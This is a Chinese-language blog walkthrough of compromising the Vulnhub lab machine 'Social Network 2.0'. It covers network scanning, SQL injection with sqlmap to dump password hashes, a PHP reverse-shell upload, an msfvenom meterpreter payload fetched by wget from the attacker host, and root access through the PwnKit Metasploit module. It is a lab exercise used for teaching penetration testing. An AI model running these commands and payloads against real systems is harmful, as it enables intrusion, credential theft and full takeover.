Vulnhub之 BoredHackerBlog: Social Network 2.0靶机详细测试过程

Socnet

作者:jason huawen

靶机信息

名称:BoredHackerBlog: Social Network 2.0

地址:

https://www.vulnhub.com/entry/boredhackerblog-social-network-20,455/

识别目标主机IP地址

(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                        
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                           
 192.168.56.100  08:00:27:26:b1:cb      1      60  PCS Systemtechnik GmbH                                                                                   
 192.168.56.169  08:00:27:5b:b3:1b      1      60  PCS Systemtechnik GmbH                                                                                   


利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.169

NMAP扫描

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.169 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-22 21:56 EDT
Nmap scan report for bogon (192.168.56.169)
Host is up (0.00040s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:d3:4e:54:fe:66:3e:f3:b2:a5:4b:51:9f:5f:f9:c6 (RSA)
|   256 de:86:ef:76:93:63:74:83:00:b1:a3:b8:c2:4c:8f:58 (ECDSA)
|_  256 b5:ec:f1:1e:9a:5a:5c:d7:02:3a:9e:1b:f7:c8:b4:53 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Social Network
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
8000/tcp open  http    BaseHTTPServer 0.3 (Python 2.7.15rc1)
|_http-server-header: BaseHTTP/0.3 Python/2.7.15rc1
|_xmlrpc-methods: XMLRPC instance doesn't support introspection.
|_http-title: Error response
MAC Address: 08:00:27:5B:B3:1B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.76 seconds

NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、8000(http)

获得Shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ nikto -h http://192.168.56.169
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.169
+ Target Hostname:    192.168.56.169
+ Target Port:        80
+ Start Time:         2023-04-22 22:00:39 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /data/: Directory indexing found.
+ OSVDB-3092: /data/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3268: /database/: Directory indexing found.
+ OSVDB-3093: /database/: Databases? Really??
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2023-04-22 22:01:42 (GMT-4) (63 seconds)
---------------------------------------------------------------------------

/databases/目录中有2个sql文件,将其下载到本地

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ cat DML.sql 
INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate)
       VALUES ("Armin", "Virgil", "armin@gmail.com", "M", "2001-02-05");
INSERT INTO users(user_firstname, user_lastname, user_nickname, user_password, user_email, user_gender, user_birthdate, user_status)
       VALUES ("Paul", "James", "Pynch", "paul@gmail.com", "M", "1998-12-19", "S");
INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate)
       VALUES ("Chris", "Wilson", "chris@gmail.com", "M", "1996-01-18");
INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate, user_status)
       VALUES ("Rory", "Blue", "rory@gmail.com", "F", "1994-04-18", "M");
INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate)
       VALUES ("Andrea", "Surman", "andrea@gmail.com", "M", "1994-06-06");

Insert语句中,并没有密码值,有点奇怪。

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ gobuster dir -u http://192.168.56.169 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.txt,.js,.bak        
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.169
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,html,js,txt,bak
[+] Timeout:                 10s
===============================================================
2023/04/22 22:06:30 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 293]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.169/images/]
/.html                (Status: 403) [Size: 294]
/index.php            (Status: 200) [Size: 10609]
/search.php           (Status: 302) [Size: 1490] [--> index.php]
/home.php             (Status: 302) [Size: 4234] [--> index.php]
/resources            (Status: 301) [Size: 320] [--> http://192.168.56.169/resources/]
/profile.php          (Status: 302) [Size: 2845] [--> index.php]
/data                 (Status: 301) [Size: 315] [--> http://192.168.56.169/data/]
/includes             (Status: 301) [Size: 319] [--> http://192.168.56.169/includes/]
/friends.php          (Status: 302) [Size: 1669] [--> index.php]
/database             (Status: 301) [Size: 319] [--> http://192.168.56.169/database/]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/functions            (Status: 301) [Size: 320] [--> http://192.168.56.169/functions/]
/requests.php         (Status: 302) [Size: 1719] [--> index.php]
/.php                 (Status: 403) [Size: 293]
/.html                (Status: 403) [Size: 294]
/server-status        (Status: 403) [Size: 302]
Progress: 1322305 / 1323366 (99.92%)
===============================================================

Gobuster工具没有扫描出有价值的信息。

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ curl http://192.168.56.169:8000/     
<head>
<title>Error response</title>
</head>
<body>
<h1>Error response</h1>
<p>Error code 501.
<p>Message: Unsupported method ('GET').
<p>Error code explanation: 501 = Server does not support this operation.
</body>

不支持GET方法?那用burpsuite拦截请求,修改为POST

但是返回是空的,没有任何内容

利用Gobuster工具,并且这只-m 请求方法参数,对8000端口进行扫描

注册一个新用户,然后登陆,有个搜索功能,貌似有SQL注入漏洞,用burpsuite拦截请求,并存储为文件

http://192.168.56.169/search.php?location=emails&query=test
(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sqlmap -r req.txt --level=3

经测试,目标主机存在SQL注入漏洞

─(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sqlmap -r req.txt --level=3 --dbs
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] socialnetwork
[*] sys

─(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sqlmap -r req.txt --level=3 -D socialnetwork --tables
Database: socialnetwork
[4 tables]
+------------+
| friendship |
| posts      |
| user_phone |
| users      |
+------------+

─(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sqlmap -r req.txt --level=3 -D socialnetwork -T users --columns
Database: socialnetwork
Table: users
[11 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| user_about     | text         |
| user_birthdate | date         |
| user_email     | varchar(255) |
| user_firstname | varchar(20)  |
| user_gender    | char(1)      |
| user_hometown  | varchar(255) |
| user_id        | int(11)      |
| user_lastname  | varchar(20)  |
| user_nickname  | varchar(20)  |
| user_password  | varchar(255) |
| user_status    | char(1)      |
+----------------+--------------+

─(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sqlmap -r req.txt --level=3 -D socialnetwork -T users -C user_email,user_password --dumpTable: users
[3 entries]
+------------------------+----------------------------------+
| user_email             | user_password                    |
+------------------------+----------------------------------+
| admin@localhost.com    | 21232f297a57a5a743894a0e4a801fc3 |
| testuser@localhost.com | 5d9c68c6c50ed3d02a2fcf54f63993b6 |
| test@test.com          | e10adc3949ba59abbe56e057f20f883e |
+------------------------+----------------------------------+


用在线网站解密,admin@localhost.com的密码为admin,成功登陆,在profile上可以上传图片,看能否将shell.php上传

没有任何过滤机制,成功上传shell.php文件,拿到目标主机反弹的shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sudo nc -nlvp 5555                                                                      
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.169] 38434
Linux socnet2 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 02:40:11 up 47 min,  0 users,  load average: 0.05, 0.31, 0.75
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@socnet2:/$ cd /home
cd /home
www-data@socnet2:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root   root   4.0K Oct 29  2018 .
drwxr-xr-x 25 root   root   4.0K Oct 29  2018 ..
drwxr-xr-x  6 socnet socnet 4.0K Oct 29  2018 socnet

提权

──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ msfvenom -p  linux/x86/meterpreter/reverse_tcp  LHOST=192.168.56.230 LPORT=6666 -f elf -o escalate.elf

创建payload后,将其上传到目标主机/tmp目录下

www-data@socnet2:/tmp$ wget http://192.168.56.230:8000/escalate.elf
wget http://192.168.56.230:8000/escalate.elf
--2023-04-23 02:55:00--  http://192.168.56.230:8000/escalate.elf
Connecting to 192.168.56.230:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: 'escalate.elf'

escalate.elf        100%[===================>]     207  --.-KB/s    in 0s      

2023-04-23 02:55:00 (39.3 MB/s) - 'escalate.elf' saved [207/207]

www-data@socnet2:/tmp$ chmod +x escalate.elf
chmod +x escalate.elf

执行该文件得到meterpreter会话,然后利用suggester定位可以提权的模块

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options 

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.56.169 - Collecting local exploits for x86/linux...
[*] 192.168.56.169 - 167 exploit checks are being tried...
[+] 192.168.56.169 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.56.169 - exploit/linux/local/nested_namespace_idmap_limit_priv_esc: The target appears to be vulnerable.
[+] 192.168.56.169 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
[+] 192.168.56.169 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.56.169 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 48 / 48
[*] 192.168.56.169 - Valid modules for session 1:
============================

 #   Name                                                               Potentially Vulnerable?  Check Result
 -   ----                                                               -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                Yes                      The target is vulnerable.

msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options 

Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PKEXEC_PATH                    no        The path to pkexec binary
   SESSION                        yes       The session to run this module on
   WRITABLE_DIR  /tmp             yes       A directory where we can write files


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   x86_64


msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 8888
LPORT => 8888
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[*] Started reverse TCP handler on 192.168.56.230:8888 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.dmofmj
[+] The target is vulnerable.
[*] Writing '/tmp/.ebvnqpec/rqmsyuzae/rqmsyuzae.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.ebvnqpec
[*] Sending stage (3020772 bytes) to 192.168.56.169
[+] Deleted /tmp/.ebvnqpec/rqmsyuzae/rqmsyuzae.so
[+] Deleted /tmp/.ebvnqpec/.omnoepjvoqxi
[+] Deleted /tmp/.ebvnqpec
[*] Meterpreter session 2 opened (192.168.56.230:8888 -> 192.168.56.169:33970) at 2023-04-23 02:30:11 -0400

meterpreter > shell
Process 1899 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls -alh
total 32K
drwx------  4 root root 4.0K Oct 29  2018 .
drwxr-xr-x 25 root root 4.0K Oct 29  2018 ..
-rw-------  1 root root    5 Oct 29  2018 .bash_history
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwxr-xr-x  3 root root 4.0K Oct 29  2018 .local
-rw-------  1 root root  128 Oct 29  2018 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4.0K Oct 29  2018 .ssh

至此拿到了root shell和root flag

posted @ 2023-04-23 14:38  Jason_huawen  阅读(319)  评论(0)    收藏  举报